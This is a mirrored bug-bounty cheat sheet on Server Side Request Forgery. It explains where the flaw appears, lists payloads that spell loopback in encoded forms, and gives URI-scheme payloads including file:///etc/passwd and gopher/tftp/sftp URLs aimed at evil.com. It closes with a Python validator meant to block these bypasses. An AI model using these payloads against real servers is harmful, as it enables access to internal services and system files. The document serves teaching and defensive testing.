mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
# Server Side Request Forgery (SSRF)

## Introduction

Server Side Request Forgery is a web application vulnerability that allows attackers to make the vulnerable server issue outgoing requests of their choosing, including requests to hosts that are only reachable from the server itself.

## Where to find

It is usually found in requests that carry another URL as a parameter, for example:

```http
POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1
```

or

```http
GET /image?url=http://192.168.1.1/ HTTP/1.1
Host: example.com
```
## How to exploit

Most of the payloads below are alternative spellings of the same loopback address. They matter because a filter that compares the submitted URL as a string (for example, rejecting the literal `127.0.0.1` or `localhost`) does not recognise them, while the address parser used by the server's HTTP client does; a sound check has to canonicalise the host and decide on the resolved address instead.

- Basic payload

  ```
  http://127.0.0.1:1337
  http://localhost:1337
  ```
- Hex encoding

  ```
  http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
  ```
- Octal encoding

  ```
  http://127.0.0.1 -> http://0177.0.0.01
  ```
- Dword encoding

  ```
  http://127.0.0.1 -> http://2130706433
  ```
- Mixed encoding

  ```
  http://127.0.0.1 -> http://0177.0.0.0x1
  ```
- Using URL encoding

  ```
  http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
  ```
- Using IPv6

  ```
  http://0000::1:1337/
  http://[::]:1337/
  ```
- Using bubble text

  ```
  http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
  ```
  Bubble text can be generated with https://capitalizemytitle.com/bubble-text-generator/
## How to exploit (URI Scheme)

- File scheme

  ```
  file:///etc/passwd
  ```
- Dict scheme

  ```
  dict://127.0.0.1:1337/
  ```
- FTP scheme

  ```
  ftp://127.0.0.1/
  ```
- TFTP scheme

  ```
  tftp://evil.com:1337/test
  ```
- SFTP scheme

  ```
  sftp://evil.com:1337/test
  ```
- LDAP scheme

  ```
  ldap://127.0.0.1:1337/
  ```
- Gopher scheme

  ```
  gopher://evil.com/_Test%0ASSRF
  ```
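A server-side URL validator, added here as an example (not code from this repository), that undoes the address spellings listed in both sections above (hex, octal, dword, mixed, percent-encoded, IPv6 and bubble text), refuses the non-HTTP schemes, and rejects anything that lands on a loopback, private or otherwise internal address. Function names, result messages and the allowed scheme list are assumptions of the example.

```python
import ipaddress
import re
import unicodedata
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # file, dict, gopher, ... are refused outright
IPV4_PART = re.compile(r"(0x[0-9a-f]+)|(0[0-7]*)|([1-9][0-9]*)")  # hex | octal | decimal

def legacy_ipv4(host):
    """inet_aton-style IPv4 (hex, octal, dword, mixed, dotted decimal) -> IPv4Address or None."""
    parts = host.split(".")
    values = []
    for p in parts:
        m = IPV4_PART.fullmatch(p)
        if not m or len(parts) > 4:
            return None
        values.append(int(p, 16 if m.group(1) else 8 if m.group(2) else 10))
    head, last = values[:-1], values[-1]
    tail_bytes = 4 - len(head)  # the last part fills all remaining bytes (dword form: all 4)
    if any(v > 255 for v in head) or last >= 256 ** tail_bytes:
        return None
    packed = 0
    for v in head:
        packed = (packed << 8) | v
    return ipaddress.IPv4Address((packed << (8 * tail_bytes)) | last)

def check_url(url):
    """Return (allowed, reason) for a user-supplied URL the server is asked to fetch."""
    try:
        parts = urlsplit(url)  # recent Python versions reject malformed bracketed hosts
    except ValueError:
        return False, "malformed URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # IPv6 brackets are already stripped here
    if not host:
        return False, "no host"
    # undo percent-encoding and Unicode look-alikes such as bubble text (NFKC maps ⓔ to e)
    host = unicodedata.normalize("NFKC", unquote(host)).lower()
    if host == "localhost" or host.endswith(".localhost"):
        return False, "localhost"
    try:
        addr = ipaddress.ip_address(host) if ":" in host else legacy_ipv4(host)
    except ValueError:
        return False, "malformed host"
    if addr is None:  # a real name: resolve it and re-run these checks on every answer at fetch time
        return True, f"hostname {host} (must be checked again after DNS resolution)"
    if addr.is_loopback or addr.is_private or addr.is_link_local or addr.is_unspecified or addr.is_reserved or addr.is_multicast:
        return False, f"internal address {addr}"
    return True, f"public address {addr}"
```

A name that passes still has to be resolved and every returned address run through the same checks at fetch time, and any redirect the HTTP client follows needs the same treatment.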